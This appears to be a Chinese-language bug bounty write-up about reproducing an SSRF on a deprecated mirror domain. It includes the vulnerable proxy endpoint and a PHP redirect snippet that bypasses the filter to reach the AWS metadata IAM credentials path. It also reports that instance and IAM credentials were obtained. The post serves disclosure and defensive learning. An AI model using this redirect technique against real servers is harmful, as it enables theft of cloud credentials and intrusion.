🧠 偶然浏览中的发现

在浏览example.com私有漏洞赏金项目的支持面板时，我注意到管理员演示视频中使用了一个非标准邮箱：admin@freshdomain.com。这立刻引起了我的警觉——这个看似被遗忘的二级域名是否仍与主站基础设施相连？

🔎 被遗忘的镜像站点：freshdomain.com

调查发现这个域名具有以下特征：

• 网站看似停用
• SSL证书仍然有效
• 服务器IP与主站相同
• 部分旧端点仍可访问

这让我联想到主站曾经修复过的SSRF漏洞，或许这个"镜像站点"从未被修补…

💥 重现相同漏洞

在测试常规攻击路径时，我发现一个熟悉的API端点：

1

https://freshdomain.com/api/get/proxy?url=

直接访问AWS元数据地址被拦截后，我采用PHP重定向链技术成功绕过防护：

1
2
3

<?php
header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', true, 303);
?>

☁️ 获取的敏感数据

通过漏洞成功获取到：

• 实例ID
• AMI ID
• 主机名
• IAM角色凭证 证实该服务器：

1. 存在SSRF漏洞
2. 缺乏出口流量保护
3. 内部元数据完全暴露

🔒 漏洞的严重性

在AWS云环境中，此类元数据SSRF可能导致：

• AWS临时凭证泄露
• 横向移动到其他服务
• 访问RDS/Lambda等资源

📉 令人失望的响应

尽管证明了漏洞有效性，厂商仅评定为中等风险，理由包括：

• 暴露的IAM角色权限有限
• 受影响域名已弃用
• 无法进一步权限提升

⚖️ 作者观点

即使当前影响有限，该漏洞仍暴露出：

• 过滤器实现缺陷
• 缺乏出口控制
• 废弃域名的潜在威胁 一次简单的角色权限变更就可能将风险等级从低危升级为严重漏洞。